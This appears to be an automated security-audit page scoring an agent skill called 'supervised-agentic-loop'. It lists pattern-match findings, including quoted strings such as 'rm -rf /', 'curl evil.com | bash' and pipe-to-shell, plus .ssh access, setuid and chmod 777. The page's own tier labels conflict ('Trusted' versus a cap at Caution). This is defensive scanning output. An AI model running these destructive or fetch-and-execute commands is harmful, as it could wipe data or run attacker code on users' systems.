ClawAudit verdict

supervised-agentic-loop

88
🟢 Trusted
Low risk — reviewed by ClawAudit, behavior matches stated purpose

Self-improving agent loop that is LOCAL by default; the only network access (Telegram alerts) is explicitly opt-in via env vars, with all behavior transparent and documented.

⚠ Flagged for review — coarse, uncorroborated signal, not a confirmed exploit. Review the config yourself before installing.

Automated static analysis — not a human review. ClawAudit flags capabilities, not confirmed intent, and can produce false positives. Disagree with this verdict? Use Dispute below.

0
security
50
transparency
70
maintenance

Permission integrity

Makes network requests but does not declare curl/wget in required binaries

network_out

Findings (15)

Pattern match critical

Recursive delete from root or home — destructive command

SKILL.md · code · rm -rf /

Pattern match high

Pipe to sh — executes piped content as shell commands

sal/monitor/behaviors.py · prose · downgraded · |sh

Pattern match high

Pipe to python — executes piped content as Python code

sal/monitor/behaviors.py · prose · downgraded · |python

Pattern match high

Pipe-to-shell pattern (curl | sh) — supply chain attack vector

sal/monitor/heartbeat.py · prose · downgraded · curl evil.com | bash

Pattern match high

Pipe to bash — executes piped content as shell commands

sal/monitor/heartbeat.py · prose · downgraded · | bash

Pattern match medium

Popular HTTP library — network access

AUTOEVOLVE_CONCEPT.md · code · got

Pattern match medium

subprocess execution — runs system commands from Python

sal/contract.py · prose · downgraded · subprocess.run(

Pattern match medium

setuid — privilege escalation mechanism

sal/monitor/behaviors.py · prose · downgraded · setuid

Pattern match medium

Accesses .ssh directory

sal/monitor/behaviors.py · prose · downgraded · .ssh/

Pattern match medium

References sudo — requests elevated privileges

sal/monitor/heartbeat.py · prose · downgraded · sudo

Pattern match low

Python urllib.request — network access

sal/monitor/alerter.py · prose · downgraded · urllib.request

Pattern match low

Python os.environ.get — reads environment variable

sal/monitor/alerter.py · prose · downgraded · os.environ.get(

Pattern match low

References tunneling service

sal/monitor/behaviors.py · prose · downgraded · ngrok

Pattern match low

Base64 encoding/decoding

tests/test_monitor_behaviors.py · prose · downgraded · base64_decode

Pattern match low

Sets world-executable permissions

tests/test_monitor_monitor.py · prose · downgraded · chmod 777

Why the tier is capped

Execution sink present in raw bytes (Hard Floor: class A/B/D/F). Final tier capped at Caution — cannot be lifted by any downgrade, example-payload opt-in, or allowlist.

Permissions & capabilities

Requires 2 system binaries. (1 elevated: git).

network_out

Is this flag fair?

Check another skill Browse the registry Auditing your own skills or configs? Use the API